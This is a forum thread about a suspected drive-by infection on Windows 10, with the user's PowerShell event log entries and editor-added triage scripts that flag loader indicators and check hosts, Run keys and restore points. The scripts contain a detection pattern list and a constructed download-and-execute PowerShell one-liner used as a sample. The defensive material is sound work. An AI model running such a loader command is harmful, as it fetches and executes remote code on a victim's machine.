Did I get Hacked - drive-by?


#1 (Posts: 30, Windows)



    Hi all,

    I'm just asking myself if I got infected by a drive-by download.

    What happened:
    It happened yesterday, when I opened a page on a maybe (?) untrustworthy (?) website (streaming).
    At almost that very moment a console window (don't know if Batch or PowerShell) opened, a few lines of code ran over the screen
    (it was really only a few, not even a full "console window") and it closed again before I could even click in it (I first tried to see what this window was doing).

    Now I'm asking myself if I have a problem ...
    * I didn't know if the site was OK
    * Was it just a coincidence?
    * I didn't know what the window was doing

    What I did/checked
    * Windows 10 Pro (22H2 19045.3570) -> is up to date
    * Mozilla Firefox -> is up to date
    * Did a "Quick Scan" with Windows Security -> no threats found
    * Did a "Full Scan" with Windows Security -> no threats found
    * Visually scanned the Windows event log in the time frame (about 5 minutes) ... but don't know if/what I found (some of them occur multiple times with slightly different IDs):

    Installation Started: Windows has started installing the following update: Security Intelligence Update for Microsoft Defender Antivirus - KB2267602 (Version 1.399.817.0)

    A service was installed in the system.

    Service Name: Universal Device Client Service
    Service File Name: "%SystemRoot%\System32\drivers\Lenovo\udc\Service\UDClientService.exe"
    Service Type: User mode service
    Service Start Type: Auto start
    Service Account: LocalSystem

    HostName=ConsoleHost
    HostVersion=5.1.19041.3570
    HostId=c3347a4e-097a-4a54-a1e9-xxxxxxxxxxxx
    HostApplication=powershell.exe -ExecutionPolicy Restricted -Command $Res = 0; $Infs = Get-Item -Path ($env:WinDir + '\inf\*.inf'); foreach ($Inf in $Infs) { $Data = Get-Content $Inf.FullName; if ($Data -match '\[defaultinstall.nt(amd64|arm|arm64|x86)\]') { $Res = 1; break; } } Write-Host 'Final result:', $Res;
    EngineVersion=5.1.19041.3570
    RunspaceId=d589f20f-7f05-49d5-9286-xxxxxxxxxxxx


    HostName=ConsoleHost
    HostVersion=5.1.19041.3570
    HostId=aabce0e3-491d-42a6-92f4-xxxxxxxxxxxx
    HostApplication=C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive get-computerinfo -Property OSName > C:\Windows\TEMP\154CA6D5-395C-41AB-BDF3-xxxxxxxxxxxx
    EngineVersion=5.1.19041.3570
    RunspaceId=d22d22e7-37a9-488a-b900-xxxxxxxxxxxx


    HostName=ConsoleHost
    HostVersion=5.1.19041.3570
    HostId=c5959b2b-1034-406b-a4aa-xxxxxxxxxxxx
    HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
    EngineVersion=
    RunspaceId=


    HostName=ConsoleHost
    HostVersion=5.1.19041.3570
    HostId=12b9f201-5800-4686-8225-xxxxxxxxxxxx
    HostApplication=C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -NoProfile -NonInteractive -WindowStyle Hidden -File C:\ProgramData\Lenovo\iMController\Plugins\LenovoUdcForImcPackage_\x64\Install.PS1
    EngineVersion=5.1.19041.3570
    RunspaceId=c6706785-50af-4212-b478-xxxxxxxxxxxx


    What I plan next:
    * Running an "Offline Scan" with Windows Security
    * Saving data that is not covered by my data backup (unfortunately I do not have a system backup; I have to check how I would do a clean install)
    * Think about running other on-demand scans (suggestions welcome)
    * Decide if I do a clean install.

    Any other suggestions?
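The entries the poster pasted are Event ID 400 ("Engine state is changed from None to Available") records from the "Windows PowerShell" log; the useful field is the HostApplication line, which is the full command line that started the engine. The script below is an added example (not part of the original post and not a Microsoft tool): it pulls the 400 events around a given time, extracts HostApplication, and flags the switches and strings that loaders typically use. The pattern list and the example timestamp are the editor's own assumptions; the third sample command line is a constructed, hypothetical malicious one, the first two are taken from the post.

```powershell
# Added example: triage PowerShell engine starts (Windows PowerShell log, Event ID 400)
# around a point in time and flag command lines that look like loader activity.
# Assumes Windows PowerShell 5.1 on Windows 10; the pattern list below is an assumption
# to be tuned to your environment, not an authoritative IOC list.

$SuspiciousPatterns = @(
    '-EncodedCommand', '-enc\b', '-e\s+[A-Za-z0-9+/=]{20,}',   # base64 payloads
    '-WindowStyle\s+Hidden', '-w\s+hidden',                     # hide the console
    '-ExecutionPolicy\s+Bypass', '-ep\s+bypass',
    'DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'Net\.WebClient',
    'Invoke-Expression', '\biex\b', 'FromBase64String',
    'mshta', 'certutil', 'rundll32', 'http[s]?://',
    '\\Users\\[^\\]+\\AppData\\', '\\Temp\\'                    # staging locations
)

function Get-HostApplication {
    param([string]$Message)
    # Event 400 messages carry "HostApplication=<command line>" on a line of its own.
    $line = ($Message -split "`r?`n") | Where-Object { $_ -like 'HostApplication=*' } | Select-Object -First 1
    if ($line) { return ($line -replace '^HostApplication=', '').Trim() }
    return $null
}

function Test-SuspiciousCommandLine {
    param([string]$CommandLine)
    # Returns the list of patterns that matched (empty array when nothing matched).
    $hits = @()
    foreach ($p in $SuspiciousPatterns) {
        if ($CommandLine -imatch $p) { $hits += $p }
    }
    return ,$hits
}

function Get-PowerShellStartsAround {
    param([datetime]$When, [int]$MinutesBefore = 5, [int]$MinutesAfter = 5)
    $filter = @{
        LogName   = 'Windows PowerShell'
        Id        = 400
        StartTime = $When.AddMinutes(-$MinutesBefore)
        EndTime   = $When.AddMinutes($MinutesAfter)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $cmd  = Get-HostApplication -Message $_.Message
        $hits = Test-SuspiciousCommandLine -CommandLine $cmd
        [pscustomobject]@{
            Time        = $_.TimeCreated
            CommandLine = $cmd
            Indicators  = ($hits -join ', ')
            Suspicious  = ($hits.Count -gt 0)
        }
    }
}

function Get-ScriptBlocksAround {
    # Script block logging (Event ID 4104) shows the script body, not just the command line,
    # but only if "Turn on PowerShell Script Block Logging" is enabled via policy.
    param([datetime]$When, [int]$Minutes = 5)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $When.AddMinutes(-$Minutes)
        EndTime   = $When.AddMinutes($Minutes)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Properties[2] of a 4104 event is ScriptBlockText.
        [pscustomobject]@{ Time = $_.TimeCreated; Text = $_.Properties[2].Value }
    }
}

# Constructed sample: two lines from the post plus one hypothetical loader command line.
$Sample = @(
    "powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';",
    "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -NoProfile -NonInteractive -WindowStyle Hidden -File C:\ProgramData\Lenovo\iMController\Plugins\LenovoUdcForImcPackage_\x64\Install.PS1",
    "powershell.exe -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
)
foreach ($c in $Sample) {
    $hits = Test-SuspiciousCommandLine -CommandLine $c
    '{0,2} hit(s): {1}' -f $hits.Count, $c
}

# Live use (hypothetical timestamp; substitute the minute the window flashed):
# Get-PowerShellStartsAround -When (Get-Date '2023-10-16 20:00') | Format-Table -AutoSize
# Get-ScriptBlocksAround     -When (Get-Date '2023-10-16 20:00') | Format-List
```

The run over the sample shows the caveat that matters here: the Lenovo installer line trips both `-ExecutionPolicy bypass` and `-WindowStyle Hidden`, exactly like the hypothetical loader. Those switches are a prompt to look further, not a verdict; what distinguishes the two is the file being run (a vendor path under ProgramData with a signed installer versus a download-and-execute one-liner), so the next step for any flagged line is to check the script path and its Authenticode signature, and the parent process if Security event 4688 with command-line auditing is available.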


#2 (Posts: 8,111, Windows 10)

    What's running at startup? And post your hosts file as text. Have you got any recent restore points? May be worth doing a system restore.
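The three checks suggested in this reply (startup entries, the hosts file, restore points) can be scripted so the result is a short list rather than something eyeballed. The block below is an added example by the editor, not code from the post: it lists active (non-comment) hosts entries, the Run/RunOnce registry entries for the machine and the current user, and the available restore points. The sample hosts content is constructed; the file and registry paths are the standard Windows ones.

```powershell
# Added example: the "post your hosts file / what's running at startup / any restore points"
# checks as functions. Assumes Windows 10; Get-ComputerRestorePoint needs an elevated shell.

function Get-ActiveHostsLines {
    param([string[]]$Lines)
    # A default Windows 10 hosts file is comments only, so every active line deserves a look.
    $Lines | ForEach-Object { $_.Trim() } | Where-Object { $_ -and -not $_.StartsWith('#') }
}

function Get-ActiveHostsEntries {
    param([string]$Path = "$env:SystemRoot\System32\drivers\etc\hosts")
    Get-ActiveHostsLines -Lines (Get-Content -Path $Path)
}

function Get-RunKeyEntries {
    # Autoruns covers far more locations; these four keys are the most common user-land persistence.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $props = Get-ItemProperty -Path $k
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -match '^PS') { continue }   # skip PSPath, PSParentPath, PSProvider, ...
            [pscustomobject]@{ Key = $k; Name = $p.Name; Command = $p.Value }
        }
    }
}

function Get-RestorePointSummary {
    # WMI returns CreationTime as a DMTF string; ConvertToDateTime turns it into a DateTime.
    Get-ComputerRestorePoint | ForEach-Object {
        [pscustomobject]@{
            Sequence    = $_.SequenceNumber
            Created     = $_.ConvertToDateTime($_.CreationTime)
            Description = $_.Description
            Type        = $_.RestorePointType
        }
    }
}

# Constructed sample hosts content: the stock comment block plus one redirect an attacker might add.
$SampleHosts = @(
    '# Copyright (c) 1993-2009 Microsoft Corp.',
    '#',
    '#      102.54.94.97     rhino.acme.com          # source server',
    '',
    '# localhost name resolution is handled within DNS itself.',
    '#	127.0.0.1       localhost',
    '0.0.0.0 update.example.invalid'
)
"Active hosts entries in sample:"
Get-ActiveHostsLines -Lines $SampleHosts          # prints only the 0.0.0.0 line

# Live checks:
# Get-ActiveHostsEntries
# Get-RunKeyEntries | Format-Table -AutoSize
# Get-RestorePointSummary | Format-Table -AutoSize
```

An active hosts line that points an update or antivirus domain at 0.0.0.0 or 127.0.0.1 is a classic way of blocking remediation and is worth more attention than a scan result; an empty list, as the poster later reports, is the expected state on a stock machine.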


#3 (Posts: 30, Windows, Thread Starter)

    I checked the hosts file -> nothing changed there.
    The Offline Scan showed no threats as well.
    The startup entries as well (checked with Autoruns from Sysinternals) do not show anything suspicious.

    I think more and more that it was just a normal process (e.g. the mentioned Lenovo updates) and just a coincidence ...

    ... but I do see a restore point on 2023-10-15 =)

